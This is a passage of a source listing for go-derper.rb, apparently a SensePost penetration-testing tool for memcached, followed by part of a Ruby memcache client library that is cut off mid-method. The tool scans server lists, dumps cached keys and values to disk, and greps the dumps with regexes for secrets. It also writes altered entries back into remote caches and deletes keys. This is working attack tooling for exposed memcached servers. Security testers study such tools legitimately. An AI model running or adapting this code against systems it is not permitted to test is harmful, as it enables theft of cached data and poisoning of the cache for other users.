time "+pretty_time(fp[:runenv][:time])+", utime=#{"%.2f" % fp[:runenv][:rusage_user]}, stime=#{"%.2f" % fp[:runenv][:rusage_system]}" 365 | puts "Mem: Max #{pretty_mem(fp[:memory][:maxbytes])}, max item size = #{pretty_mem(fp[:memory][:item_size_max])}" 366 | puts "Network: curr conn #{fp[:runenv][:curr_connections]}, bytes read #{pretty_mem(fp[:network][:bytes_read])}, bytes written #{pretty_mem(fp[:network][:bytes_written])}" 367 | puts "Cache: get #{pretty_num(fp[:cache][:cmd_get])}, set #{pretty_num(fp[:cache][:cmd_set])}, bytes stored #{pretty_mem(fp[:cache][:bytes])}, curr item count #{pretty_num(fp[:cache][:curr_items])}, total items #{pretty_num(fp[:cache][:total_items])}, total slabs #{pretty_num(fp[:cache][:total_slabs])}" 368 | puts "Stats capabilities: #{fp[:runenv][:capabilities].join(" ")}" 369 | puts "" 370 | end 371 | 372 | end 373 | 374 | def process_items(items_in) 375 | items_out = {} 376 | total_items=0 377 | items_in.keys.each do |k| 378 | (prefix,s_num,label) = k.split(/:/) 379 | throw Exception.new("stats data malformed, can't split(/,/) \"#{k}\" into three") if prefix.nil? or s_num.nil? or label.nil? 380 | s_num = s_num.to_i 381 | items_out[s_num] = {} if items_out[s_num].nil? 382 | 383 | items_out[s_num][label.to_sym] = items_in[k] 384 | 385 | total_items+= items_in[k].to_i if label.to_sym == :number 386 | end 387 | {:items=>items_out,:total_items=>total_items,:total_slabs=>items_out.length} 388 | end 389 | 390 | def fingerprint 391 | fp = {:runenv=>{},:memory=>{},:cache=>{},:network=>{}} 392 | 393 | fp[:runenv][:capabilities]=@cache.probe_stats_capabilities 394 | data=refresh_cache("").dup 395 | fp[:runenv][:pid]=data["pid"] 396 | fp[:runenv][:uptime]=data["uptime"] 397 | fp[:runenv][:time]=data["time"] 398 | fp[:runenv][:version]=data["version"] 399 | fp[:runenv][:rusage_user]=data["rusage_user"] 400 | fp[:runenv][:rusage_system]=data["rusage_system"] 401 | fp[:runenv][:curr_connections]=data["curr_connections"] 402 | fp[:network][:bytes_read]=data["bytes_read"] 403 | fp[:network][:bytes_written]=data["bytes_written"] 404 | fp[:cache][:cmd_get]=data["cmd_get"] 405 | fp[:cache][:cmd_set]=data["cmd_set"] 406 | fp[:cache][:bytes]=data["bytes"] 407 | fp[:cache][:curr_items]=data["curr_items"] 408 | 409 | 410 | begin 411 | data=refresh_cache("settings").dup 412 | fp[:memory][:maxbytes]=data["maxbytes"] 413 | fp[:memory][:item_size_max]=data["item_size_max"] 414 | rescue MemCache::MemCacheError 415 | fp[:memory][:maxbytes]=-1 416 | fp[:memory][:item_size_max]=-1 417 | end 418 | 419 | begin 420 | data=refresh_cache("items").dup 421 | items=process_items(data) 422 | fp[:cache][:total_items]=items[:total_items] 423 | fp[:cache][:total_slabs]=items[:total_slabs] 424 | rescue MemCache::MemCacheError 425 | fp[:cache][:total_items]=-1 426 | fp[:cache][:total_slabs]=-1 427 | end 428 | fp 429 | end 430 | 431 | def get_version 432 | self.get_field("version") 433 | end 434 | end 435 | 436 | def usage 437 | puts " 438 | go-derper.rb v0.11 (c) marco@sensepost.com 439 | 440 | \t-h\thelp 441 | \t-s\t 442 | \t-p\t 443 | \t-n\t 444 | \t-S\tstats summary mode 445 | \t-t\t 446 | \t-L\tlist all slabs 447 | \t-l\tleach mode 448 | \t-k\t 449 | \t-d\t 450 | \t-K\t (leach mode) 451 | \t-R\t 452 | \t-m\t monitor mode 453 | \t-M\t (monitor mode) 454 | \t-f\t 455 | \t-F\t 456 | \t-c\t[ csv | multiline ] fingerprint output format (multiline is default) 457 | \t-o\t (must exist) 458 | \t-i\tinclude the slabs_id in output filename 459 | \t-r\t 460 | \t-v\tverbose (multiple for more) 461 | \t-w\t 
462 | \t-z\tdetect and expand zlib streams 463 | " 464 | end 465 | 466 | opt = GetoptLong.new( 467 | ["--help", "-h", GetoptLong::NO_ARGUMENT], 468 | ["--server", "-s", GetoptLong::REQUIRED_ARGUMENT], 469 | ["--port", "-p", GetoptLong::OPTIONAL_ARGUMENT], 470 | ["--namespace", "-n", GetoptLong::REQUIRED_ARGUMENT], 471 | ["--stats", "-S", GetoptLong::OPTIONAL_ARGUMENT], 472 | ["--timeout", "-t", GetoptLong::REQUIRED_ARGUMENT], 473 | ["--leach", "-l", GetoptLong::OPTIONAL_ARGUMENT], 474 | ["--keylimit", "-K", GetoptLong::REQUIRED_ARGUMENT], 475 | ["--key", "-k", GetoptLong::REQUIRED_ARGUMENT], 476 | ["--delete-key", "-d", GetoptLong::REQUIRED_ARGUMENT], 477 | ["--regexes", "-R", GetoptLong::REQUIRED_ARGUMENT], 478 | ["--monitor", "-m", GetoptLong::OPTIONAL_ARGUMENT], 479 | ["--monitor-gap", "-M", GetoptLong::REQUIRED_ARGUMENT], 480 | ["--fingerprint", "-f", GetoptLong::REQUIRED_ARGUMENT], 481 | ["--fingerprint-file", "-F", GetoptLong::REQUIRED_ARGUMENT], 482 | ["--fingerprint-output","-c", GetoptLong::REQUIRED_ARGUMENT], 483 | ["--output-directory", "-o", GetoptLong::REQUIRED_ARGUMENT], 484 | ["--output-prefix", "-P", GetoptLong::REQUIRED_ARGUMENT], 485 | ["--quiet", "-q", GetoptLong::NO_ARGUMENT], 486 | ["--list-slabs", "-L", GetoptLong::NO_ARGUMENT], 487 | ["--include-slabs-id-in-filename", "-i", GetoptLong::NO_ARGUMENT], 488 | ["--zlib-expand", "-z", GetoptLong::NO_ARGUMENT], 489 | ["--verbose", "-v", GetoptLong::NO_ARGUMENT], 490 | ["--write", "-w", GetoptLong::REQUIRED_ARGUMENT] 491 | ) 492 | 493 | server = nil 494 | port = 11211 495 | namespace = nil 496 | mode = nil 497 | mode_inputs = nil 498 | timeout = 5 499 | monitor_gap = 10 500 | key_limit = 10 501 | output_directory = "" 502 | output_prefix = "" 503 | include_slabs_id_in_filename = false 504 | zlib_expand = false 505 | fingerprint_output="multiline" 506 | requested_key=nil 507 | delete_key=nil 508 | regexes=[] 509 | 510 | 511 | opt.each do |opt, arg| 512 | dprint "opt=#{opt},arg=#{arg}" 513 | case opt 514 | when "--help" 515 | usage 516 | exit(1) 517 | when "--server" 518 | server = arg 519 | when "--port" 520 | port = arg 521 | when "--namespace" 522 | namespace = arg 523 | when "--stats" 524 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 525 | mode = :stats 526 | if arg.nil? or arg.length == 0 527 | dprint "No args, setting to \"all\"" 528 | mode_inputs = "all" 529 | else 530 | dprint "Arg found, setting to \"#{arg}\"" 531 | mode_inputs = arg 532 | end 533 | when "--monitor" 534 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 535 | mode = :monitor 536 | mode_inputs = "" #default 537 | mode_inputs = arg if !arg.nil? 538 | when "--monitor-gap" 539 | monitor_gap = arg.to_i 540 | when "--timeout" 541 | timeout = arg.to_i 542 | when "--verbose" 543 | @@minl -= 1 if @@minl > 1 544 | when "--fingerprint" 545 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 546 | mode = :fingerprint 547 | mode_inputs = arg 548 | when "--fingerprint-file" 549 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 
550 | mode = :fingerprintfile 551 | mode_inputs = arg 552 | begin 553 | f=File.open(mode_inputs) 554 | f.close 555 | rescue Exception => e 556 | eprint("Could not open file for -F: #{e.to_s}") 557 | exit(1) 558 | end 559 | when "--fingerprint-output" 560 | if arg != "multiline" and arg != "csv" then 561 | eprint("--fingerprint-output can be either \"multiline\" or \"csv\", but not \"#{arg}\"") 562 | exit(1) 563 | end 564 | fingerprint_output = arg 565 | @@minl = WARNING if arg == "csv" #raise level to warning or above when writing .csv 566 | when "--leach" 567 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 568 | mode = :leach 569 | mode_inputs = 0 #default 570 | mode_inputs = arg if !arg.nil? 571 | when "--list-slabs" 572 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 573 | mode = :list_slabs 574 | mode_inputs = 0 #default 575 | when "--delete-key" 576 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 577 | mode_inputs = arg 578 | mode = :delete_key 579 | when "--output-directory" 580 | output_directory = arg 581 | when "--output-prefix" 582 | output_prefix = arg 583 | when "--include-slabs-id-in-filename" 584 | include_slabs_id_in_filename = true 585 | when "--key" 586 | requested_key = arg 587 | when "--keylimit" 588 | key_limit = arg.to_i 589 | dprint "Keylimit set to #{key_limit}" 590 | when "--regexes" 591 | begin 592 | f=File.open(arg) 593 | f.readlines.join.split(/\n/).each do |regex| 594 | next if regex == "" or regex =~ /^#/ 595 | regexes << Regexp.new(regex, Regexp::IGNORECASE | Regexp::MULTILINE) 596 | end 597 | f.close 598 | dprint("Loaded #{regexes.length} regular expressions") 599 | rescue Exception => e 600 | eprint("Could not open file for -r: #{e.to_s}") 601 | exit(1) 602 | end 603 | when "--quiet" 604 | @@minl = NONE 605 | when "--write" 606 | eprint "Only one mode allowed, trying to overwrite #{mode.id2name} mode with #{opt}", true if !mode.nil? 607 | mode = :writeentry 608 | mode_inputs = arg 609 | begin 610 | f=File.open(mode_inputs) 611 | f.close 612 | rescue Exception => e 613 | eprint("Could not open file for -w: #{e.to_s}") 614 | exit(1) 615 | end 616 | begin 617 | index_filename=File.dirname(mode_inputs)+"/"+File.basename(mode_inputs).split(/-/)[0]+"-index" 618 | f=File.open(index_filename) 619 | rescue Errno::NOENT 620 | eprint("Could not determine index file (#{index_filename}) for #{mode_inputs}") 621 | exit(1) 622 | end 623 | when "--zlib-expand" 624 | zlib_expand = true 625 | end 626 | end 627 | 628 | #default mode 629 | if mode.nil? then 630 | mode = :stats 631 | mode_inputs = "all" 632 | end 633 | 634 | if (mode == :monitor or mode == :stats) and (server.nil? or port.nil? or namespace.nil?) then 635 | eprint "I need a server, port and namespace. Until such time, i refuse to run." 
636 | usage 637 | exit(1) 638 | end 639 | 640 | dprint "Running in mode #{mode.id2name} with input #{mode_inputs}" 641 | 642 | 643 | case mode 644 | when :stats 645 | CACHE = MemCacheEx.new "#{server}:#{port}", :namespace => namespace, :timeout => timeout 646 | s=Stats.new 647 | s.open(CACHE) 648 | dbgprint INFO, s.get_field(mode_inputs) 649 | when :monitor 650 | CACHE = MemCacheEx.new "#{server}:#{port}", :namespace => namespace, :timeout => timeout 651 | s=Stats.new 652 | s.open(CACHE) 653 | s.monitor(0, mode_inputs,monitor_gap) 654 | when :fingerprint 655 | mode_inputs.split(/,/).each do |server| 656 | begin 657 | iprint "Scanning #{server}" 658 | s=Stats.new 659 | s.open(MemCacheEx.new("#{server}", :namespace => namespace, :timeout => timeout)) 660 | s.print_fingerprint(s.fingerprint,fingerprint_output) 661 | rescue Exception => e 662 | puts e.to_s 663 | end 664 | end 665 | when :fingerprintfile 666 | File.open(mode_inputs).readlines.join.split(/\n/).each do |server| 667 | begin 668 | iprint "Scanning #{server}" 669 | s=Stats.new 670 | s.open(MemCacheEx.new("#{server}", :namespace => namespace, :timeout => timeout)) 671 | s.print_fingerprint(s.fingerprint,fingerprint_output) 672 | rescue Exception => e 673 | puts e.to_s 674 | end 675 | end 676 | when :leach 677 | #let's make sure we can write data first 678 | if output_directory == "" 679 | wprint("No output directory specified, defaulting to ./output") 680 | output_directory = "output" 681 | end 682 | 683 | begin 684 | Dir.new(output_directory) 685 | rescue Errno::ENOENT 686 | eprint("Directory #{output_directory} does not exist, please create it and run me again.") 687 | exit(1) 688 | end 689 | 690 | if output_prefix == "" 691 | i=0 692 | begin 693 | i+=1 694 | output_prefix = "run"+i.to_s 695 | end while File::exists?(output_directory+"/"+output_prefix+"-index") 696 | wprint("No prefix supplied, using \"#{output_prefix}\"") 697 | end 698 | 699 | #now conncet and pull from the cache 700 | if server.nil? or port.nil? 701 | eprint("-l requires a server specified with -s") 702 | exit(1) 703 | end 704 | 705 | #initialise the cache object 706 | CACHE = MemCacheEx.new "#{server}:#{port}", :namespace => namespace, :timeout => timeout 707 | l=Leacher.new 708 | l.open(CACHE) 709 | dprint "Leaching slabs_id #{mode_inputs} for #{key_limit} keys" 710 | if l.canleach? then 711 | #start leaching. heavy-lifting of retrieving keys and values falls to class Leach. here, we just supply 712 | #a handler for outputting the key,val pair to disk. we also handle zlib streams, if we find them 713 | l.leach(mode_inputs,key_limit,requested_key) do |slabs_id, key, flags, value| 714 | if !value.nil? 
and value.length >= 2 && zlib_expand && value[0] == 0x78 and value[1] == 0x9c then 715 | value = Zlib::Inflate.inflate(value) 716 | dprint("Inflated value is: #{value}") 717 | slabs_id = "z_"+slabs_id.to_s 718 | end 719 | key.gsub!(/,/,"IWASACOMMA") 720 | #each entry is also recorded in the index file, which saves the orginating server and key 721 | filename = output_prefix+"-"+Digest::SHA1.hexdigest(key) 722 | index_entry = "#{server}:#{port},#{slabs_id.to_s},#{key},#{flags},#{value.length},#{output_directory}/#{filename}\n" 723 | begin 724 | f_i=File.open("#{output_directory}/#{output_prefix}-index","a") 725 | f_i.write(index_entry) 726 | f_i.close 727 | 728 | f_k=File.new("#{output_directory}/#{filename}","w") 729 | f_k.write(value) 730 | f_k.close 731 | 732 | #if there are any regex matches, print to screen now 733 | regexes.each do |regex| 734 | begin 735 | m = regex.match(value) 736 | skipped=0 737 | 1.upto(m.length-1) do |i| 738 | dprint("Matched token (i="+i.to_s+"): "+m[i]) 739 | next if i!=1 and m[1].include?(m[i]) 740 | iprint("Found in #{output_directory}/#{filename} at #{m.begin(i)+skipped} -> #{m[i]}") 741 | end if m 742 | if m 743 | skipped+=m.end(0) 744 | value = value[m.end(0)..-1] 745 | end 746 | end while m 747 | end 748 | rescue Errno::ENOENT 749 | eprint("Failed to create the output file. Does the directory exist? Exiting.") 750 | exit(1) 751 | end 752 | vprint("leached from slab #{slabs_id.to_s} #{filename} -> #{key} (#{value.length.to_s} bytes)") 753 | end 754 | else 755 | eprint("Can't enable debug mode on server, leaching only through brute-force is currently unsupported") 756 | end 757 | when :list_slabs 758 | cache = MemCacheEx.new "#{server}:#{port}", :namespace => namespace, :timeout => timeout 759 | cache.get_slabs_info.each do |server,slabs| 760 | slabs.keys.each do |slabs_id| 761 | s = "" 762 | s += "\t#{slabs[slabs_id]["number"]} (Cache entries)" if !slabs[slabs_id]["number"].nil? 763 | s += "\t#{slabs[slabs_id]["chunk_size"]} (Chunk size)" if !slabs[slabs_id]["chunk_size"].nil? 764 | s += "\t#{slabs[slabs_id]["mem_requested"]} (Mem requested)" if !slabs[slabs_id]["mem_requested"].nil? 765 | iprint("\t#{server}\t#{slabs_id}#{s}") 766 | end 767 | end 768 | when :writeentry 769 | #First, determine which server and key we're going to write to. 
This is stored in the index file 770 | entry_filename = mode_inputs 771 | index_filename=File.dirname(entry_filename)+"/"+File.basename(entry_filename).split(/-/)[0]+"-index" 772 | dprint("Checking in #{index_filename}") 773 | server_and_port,slabs_id,key,flags,entry_size,filename = "","","","","","" 774 | begin 775 | f_i=File.open(index_filename) 776 | indexes=f_i.readlines.join.split("\n") 777 | found=false 778 | indexes.each do |index_line| 779 | (server_and_port,slabs_id,key,flags,entry_size,filename) = index_line.split(/,/) 780 | key.gsub!(/IWASACOMMA/,",") 781 | if entry_filename == filename then 782 | found=true 783 | break 784 | end 785 | end 786 | f_i.close 787 | if found == false 788 | eprint("Could not find an entry for #{entry_filename} in index file #{index_filename}") 789 | exit(1) 790 | end 791 | server,port = server_and_port.split(/:/) 792 | port = port.to_i 793 | flags=flags.to_i 794 | if server == "" or !(port>0) or slabs_id == "" or key == "" then 795 | eprint("Unknown error led to server,slabs_id or key being empty, or the port number was incorrect") 796 | exit(1) 797 | end 798 | f_e = File.open(entry_filename) 799 | entry = f_e.read(File.stat(entry_filename).size) 800 | dprint("entry is #{File.stat(entry_filename).size} bytes") 801 | f_e.close 802 | vprint("Setting entry on server #{server}:#{port.to_s} with key \"#{key}\" and flags \"#{flags}\"") 803 | dprint("Entry value is \"#{entry}\"") 804 | cache = MemCacheEx.new "#{server}:#{port}", :namespace => (namespace==""?nil:namespace), :timeout => timeout 805 | cache.set(key,entry,0,true,flags) 806 | rescue Errno::ENOENT => e 807 | eprint("An error occurred: #{e.to_s}") 808 | end 809 | when :delete_key 810 | entry_filename = mode_inputs 811 | index_filename=File.dirname(entry_filename)+"/"+File.basename(entry_filename).split(/-/)[0]+"-index" 812 | dprint("Checking in #{index_filename}") 813 | server_and_port,slabs_id,key,flags,entry_size,filename = "","","","","","" 814 | begin 815 | f_i=File.open(index_filename) 816 | indexes=f_i.readlines.join.split("\n") 817 | found=false 818 | indexes.each do |index_line| 819 | (server_and_port,slabs_id,key,flags,entry_size,filename) = index_line.split(/,/) 820 | key.gsub!(/IWASACOMMA/,",") 821 | if entry_filename == filename then 822 | found=true 823 | break 824 | end 825 | end 826 | f_i.close 827 | if found == false 828 | eprint("Could not find an entry for #{entry_filename} in index file #{index_filename}") 829 | exit(1) 830 | end 831 | server,port = server_and_port.split(/:/) 832 | port = port.to_i 833 | flags=flags.to_i 834 | if server == "" or !(port>0) or slabs_id == "" or key == "" then 835 | eprint("Unknown error led to server,slabs_id or key being empty, or the port number was incorrect") 836 | exit(1) 837 | end 838 | 839 | cache = MemCacheEx.new "#{server}:#{port}", :namespace => (namespace==""?nil:namespace), :timeout => timeout 840 | cache.delete(key) 841 | rescue Errno::ENOENT => e 842 | eprint("An error occurred: #{e.to_s}") 843 | end 844 | else 845 | eprint "Unknown mode" 846 | end 847 | -------------------------------------------------------------------------------- /memcache.rb: -------------------------------------------------------------------------------- 1 | # encoding: utf-8 2 | $TESTING = defined?($TESTING) && $TESTING 3 | 4 | require 'socket' 5 | require 'thread' 6 | require 'zlib' 7 | require 'digest/sha1' 8 | require 'net/protocol' 9 | require 'memcache/version' 10 | 11 | begin 12 | # Try to use the SystemTimer gem instead of Ruby's timeout library 13 | # 
when running on Ruby 1.8.x. See: 14 | # http://ph7spot.com/articles/system_timer 15 | # We don't want to bother trying to load SystemTimer on jruby, 16 | # ruby 1.9+ and rbx. 17 | if !defined?(RUBY_ENGINE) || (RUBY_ENGINE == 'ruby' && RUBY_VERSION < '1.9.0') 18 | require 'system_timer' 19 | MemCacheTimer = SystemTimer 20 | else 21 | require 'timeout' 22 | MemCacheTimer = Timeout 23 | end 24 | rescue LoadError => e 25 | puts "[memcache-client] Could not load SystemTimer gem, falling back to Ruby's slower/unsafe timeout library: #{e.message}" 26 | require 'timeout' 27 | MemCacheTimer = Timeout 28 | end 29 | 30 | 31 | ## 32 | # A Ruby client library for memcached. 33 | # 34 | 35 | class MemCache 36 | 37 | ## 38 | # Default options for the cache object. 39 | 40 | DEFAULT_OPTIONS = { 41 | :namespace => nil, 42 | :readonly => false, 43 | :multithread => true, 44 | :failover => true, 45 | :timeout => 0.5, 46 | :logger => nil, 47 | :no_reply => false, 48 | :check_size => true, 49 | :autofix_keys => false, 50 | :namespace_separator => ':', 51 | } 52 | 53 | ## 54 | # Default memcached port. 55 | 56 | DEFAULT_PORT = 11211 57 | 58 | ## 59 | # Default memcached server weight. 60 | 61 | DEFAULT_WEIGHT = 1 62 | 63 | ## 64 | # The namespace for this instance 65 | 66 | attr_reader :namespace 67 | 68 | ## 69 | # The multithread setting for this instance 70 | 71 | attr_reader :multithread 72 | 73 | ## 74 | # Whether to try to fix keys that are too long and will be truncated by 75 | # using their SHA1 hash instead. 76 | # The hash is only used on keys longer than 250 characters, or containing spaces, 77 | # to avoid impacting performance unnecesarily. 78 | # 79 | # In theory, your code should generate correct keys when calling memcache, 80 | # so it's your responsibility and you should try to fix this problem at its source. 81 | # 82 | # But if that's not possible, enable this option and memcache-client will give you a hand. 83 | 84 | attr_reader :autofix_keys 85 | 86 | ## 87 | # The servers this client talks to. Play at your own peril. 88 | 89 | attr_reader :servers 90 | 91 | ## 92 | # Socket timeout limit with this client, defaults to 0.5 sec. 93 | # Set to nil to disable timeouts. 94 | 95 | attr_reader :timeout 96 | 97 | ## 98 | # Should the client try to failover to another server if the 99 | # first server is down? Defaults to true. 100 | 101 | attr_reader :failover 102 | 103 | ## 104 | # Log debug/info/warn/error to the given Logger, defaults to nil. 105 | 106 | attr_reader :logger 107 | 108 | ## 109 | # Don't send or look for a reply from the memcached server for write operations. 110 | # Please note this feature only works in memcached 1.2.5 and later. Earlier 111 | # versions will reply with "ERROR". 112 | attr_reader :no_reply 113 | 114 | ## 115 | # Accepts a list of +servers+ and a list of +opts+. +servers+ may be 116 | # omitted. See +servers=+ for acceptable server list arguments. 117 | # 118 | # Valid options for +opts+ are: 119 | # 120 | # [:namespace] Prepends this value to all keys added or retrieved. 121 | # [:readonly] Raises an exception on cache writes when true. 122 | # [:multithread] Wraps cache access in a Mutex for thread safety. Defaults to true. 123 | # [:failover] Should the client try to failover to another server if the 124 | # first server is down? Defaults to true. 125 | # [:timeout] Time to use as the socket read timeout. Defaults to 0.5 sec, 126 | # set to nil to disable timeouts. 
127 | # [:logger] Logger to use for info/debug output, defaults to nil 128 | # [:no_reply] Don't bother looking for a reply for write operations (i.e. they 129 | # become 'fire and forget'), memcached 1.2.5 and later only, speeds up 130 | # set/add/delete/incr/decr significantly. 131 | # [:check_size] Raises a MemCacheError if the value to be set is greater than 1 MB, which 132 | # is the maximum key size for the standard memcached server. Defaults to true. 133 | # [:autofix_keys] If a key is longer than 250 characters or contains spaces, 134 | # use an SHA1 hash instead, to prevent collisions on truncated keys. 135 | # Other options are ignored. 136 | 137 | def initialize(*args) 138 | servers = [] 139 | opts = {} 140 | 141 | case args.length 142 | when 0 then # NOP 143 | when 1 then 144 | arg = args.shift 145 | case arg 146 | when Hash then opts = arg 147 | when Array then servers = arg 148 | when String then servers = [arg] 149 | else raise ArgumentError, 'first argument must be Array, Hash or String' 150 | end 151 | when 2 then 152 | servers, opts = args 153 | else 154 | raise ArgumentError, "wrong number of arguments (#{args.length} for 2)" 155 | end 156 | 157 | @evented = defined?(EM) && EM.reactor_running? 158 | opts = DEFAULT_OPTIONS.merge opts 159 | @namespace = opts[:namespace] 160 | @readonly = opts[:readonly] 161 | @multithread = opts[:multithread] && !@evented 162 | @autofix_keys = opts[:autofix_keys] 163 | @timeout = opts[:timeout] 164 | @failover = opts[:failover] 165 | @logger = opts[:logger] 166 | @no_reply = opts[:no_reply] 167 | @check_size = opts[:check_size] 168 | @namespace_separator = opts[:namespace_separator] 169 | @mutex = Mutex.new if @multithread 170 | 171 | logger.info { "memcache-client #{VERSION} #{Array(servers).inspect}" } if logger 172 | 173 | Thread.current[:memcache_client] = self.object_id if !@multithread 174 | 175 | 176 | self.servers = servers 177 | end 178 | 179 | ## 180 | # Returns a string representation of the cache object. 181 | 182 | def inspect 183 | "" % 184 | [@servers.length, @namespace, @readonly] 185 | end 186 | 187 | ## 188 | # Returns whether there is at least one active server for the object. 189 | 190 | def active? 191 | not @servers.empty? 192 | end 193 | 194 | ## 195 | # Returns whether or not the cache object was created read only. 196 | 197 | def readonly? 198 | @readonly 199 | end 200 | 201 | ## 202 | # Set the servers that the requests will be distributed between. Entries 203 | # can be either strings of the form "hostname:port" or 204 | # "hostname:port:weight" or MemCache::Server objects. 205 | # 206 | def servers=(servers) 207 | # Create the server objects. 208 | @servers = Array(servers).collect do |server| 209 | case server 210 | when String 211 | host, port, weight = server.split ':', 3 212 | port ||= DEFAULT_PORT 213 | weight ||= DEFAULT_WEIGHT 214 | Server.new self, host, port, weight 215 | else 216 | server 217 | end 218 | end 219 | 220 | logger.debug { "Servers now: #{@servers.inspect}" } if logger 221 | 222 | # There's no point in doing this if there's only one server 223 | @continuum = create_continuum_for(@servers) if @servers.size > 1 224 | 225 | @servers 226 | end 227 | 228 | ## 229 | # Decrements the value for +key+ by +amount+ and returns the new value. 230 | # +key+ must already exist. If +key+ is not an integer, it is assumed to be 231 | # 0. +key+ can not be decremented below 0. 
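  # On the wire this issues the memcached text-protocol command
  #   decr <key> <amount>\r\n
  # and the server replies with the new value, or NOT_FOUND if the key is absent.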
232 | 233 | def decr(key, amount = 1) 234 | raise MemCacheError, "Update of readonly cache" if @readonly 235 | with_server(key) do |server, cache_key| 236 | cache_decr server, cache_key, amount 237 | end 238 | rescue TypeError => err 239 | handle_error nil, err 240 | end 241 | 242 | ## 243 | # Retrieves +key+ from memcache. If +raw+ is false, the value will be 244 | # unmarshalled. 245 | 246 | def get(key, raw = false) 247 | with_server(key) do |server, cache_key| 248 | logger.debug { "get #{key} from #{server.inspect}" } if logger 249 | (flags,value) = cache_get server, cache_key 250 | return nil if value.nil? 251 | value = Marshal.load value unless raw 252 | return [flags,value] 253 | end 254 | rescue TypeError => err 255 | handle_error nil, err 256 | end 257 | 258 | ## 259 | # Performs a +get+ with the given +key+. If 260 | # the value does not exist and a block was given, 261 | # the block will be called and the result saved via +add+. 262 | # 263 | # If you do not provide a block, using this 264 | # method is the same as using +get+. 265 | # 266 | def fetch(key, expiry = 0, raw = false) 267 | value = get(key, raw) 268 | 269 | if value.nil? && block_given? 270 | value = yield 271 | add(key, value, expiry, raw) 272 | end 273 | 274 | value 275 | end 276 | 277 | ## 278 | # Retrieves multiple values from memcached in parallel, if possible. 279 | # 280 | # The memcached protocol supports the ability to retrieve multiple 281 | # keys in a single request. Pass in an array of keys to this method 282 | # and it will: 283 | # 284 | # 1. map the key to the appropriate memcached server 285 | # 2. send a single request to each server that has one or more key values 286 | # 287 | # Returns a hash of values. 288 | # 289 | # cache["a"] = 1 290 | # cache["b"] = 2 291 | # cache.get_multi "a", "b" # => { "a" => 1, "b" => 2 } 292 | # 293 | # Note that get_multi assumes the values are marshalled. You can pass 294 | # in :raw => true to bypass value marshalling. 295 | # 296 | # cache.get_multi('a', 'b', ..., :raw => true) 297 | 298 | def get_multi(*keys) 299 | raise MemCacheError, 'No active servers' unless active? 300 | 301 | opts = keys.last.is_a?(Hash) ? keys.pop : {} 302 | 303 | keys.flatten! 304 | key_count = keys.length 305 | cache_keys = {} 306 | server_keys = Hash.new { |h,k| h[k] = [] } 307 | 308 | # map keys to servers 309 | keys.each do |key| 310 | server, cache_key = request_setup key 311 | cache_keys[cache_key] = key 312 | server_keys[server] << cache_key 313 | end 314 | 315 | results = {} 316 | raw = opts[:raw] || false 317 | server_keys.each do |server, keys_for_server| 318 | keys_for_server_str = keys_for_server.join ' ' 319 | begin 320 | values = cache_get_multi server, keys_for_server_str 321 | values.each do |key, value| 322 | results[cache_keys[key]] = raw ? value : Marshal.load(value) 323 | end 324 | rescue IndexError => e 325 | # Ignore this server and try the others 326 | logger.warn { "Unable to retrieve #{keys_for_server.size} elements from #{server.inspect}: #{e.message}"} if logger 327 | end 328 | end 329 | 330 | return results 331 | rescue TypeError => err 332 | handle_error nil, err 333 | end 334 | 335 | ## 336 | # Increments the value for +key+ by +amount+ and returns the new value. 337 | # +key+ must already exist. If +key+ is not an integer, it is assumed to be 338 | # 0. 
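  # As with decr, this issues the text-protocol command
  #   incr <key> <amount>\r\n
  # and the server replies with the new value, or NOT_FOUND if the key is absent.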
339 | 340 | def incr(key, amount = 1) 341 | raise MemCacheError, "Update of readonly cache" if @readonly 342 | with_server(key) do |server, cache_key| 343 | cache_incr server, cache_key, amount 344 | end 345 | rescue TypeError => err 346 | handle_error nil, err 347 | end 348 | 349 | ## 350 | # Add +key+ to the cache with value +value+ that expires in +expiry+ 351 | # seconds. If +raw+ is true, +value+ will not be Marshalled. 352 | # 353 | # Warning: Readers should not call this method in the event of a cache miss; 354 | # see MemCache#add. 355 | 356 | ONE_MB = 1024 * 1024 357 | 358 | def set(key, value, expiry = 0, raw = false, flags = 0) 359 | raise MemCacheError, "Update of readonly cache" if @readonly 360 | 361 | value = Marshal.dump value unless raw 362 | with_server(key) do |server, cache_key| 363 | logger.debug { "set #{key} to #{server.inspect}: #{value.to_s.size}" } if logger 364 | 365 | if @check_size && value.to_s.size > ONE_MB 366 | raise MemCacheError, "Value too large, memcached can only store 1MB of data per key" 367 | end 368 | 369 | command = "set #{cache_key} #{flags} #{expiry} #{value.to_s.size}#{noreply}\r\n#{value}\r\n" 370 | 371 | with_socket_management(server) do |socket| 372 | socket.write command 373 | break nil if @no_reply 374 | result = socket.gets 375 | raise_on_error_response! result 376 | 377 | if result.nil? 378 | server.close 379 | raise MemCacheError, "lost connection to #{server.host}:#{server.port}" 380 | end 381 | 382 | result 383 | end 384 | end 385 | end 386 | 387 | ## 388 | # "cas" is a check and set operation which means "store this data but 389 | # only if no one else has updated since I last fetched it." This can 390 | # be used as a form of optimistic locking. 391 | # 392 | # Works in block form like so: 393 | # cache.cas('some-key') do |value| 394 | # value + 1 395 | # end 396 | # 397 | # Returns: 398 | # +nil+ if the value was not found on the memcached server. 399 | # +STORED+ if the value was updated successfully 400 | # +EXISTS+ if the value was updated by someone else since last fetch 401 | 402 | def cas(key, expiry=0, raw=false) 403 | raise MemCacheError, "Update of readonly cache" if @readonly 404 | raise MemCacheError, "A block is required" unless block_given? 405 | 406 | (value, token) = gets(key, raw) 407 | return nil unless value 408 | updated = yield value 409 | value = raw ? updated : Marshal.dump(updated) 410 | 411 | with_server(key) do |server, cache_key| 412 | logger.debug { "cas #{key} to #{server.inspect}: #{value.to_s.size}" } if logger 413 | command = "cas #{cache_key} 0 #{expiry} #{value.to_s.size} #{token}#{noreply}\r\n#{value}\r\n" 414 | 415 | with_socket_management(server) do |socket| 416 | socket.write command 417 | break nil if @no_reply 418 | result = socket.gets 419 | raise_on_error_response! result 420 | 421 | if result.nil? 422 | server.close 423 | raise MemCacheError, "lost connection to #{server.host}:#{server.port}" 424 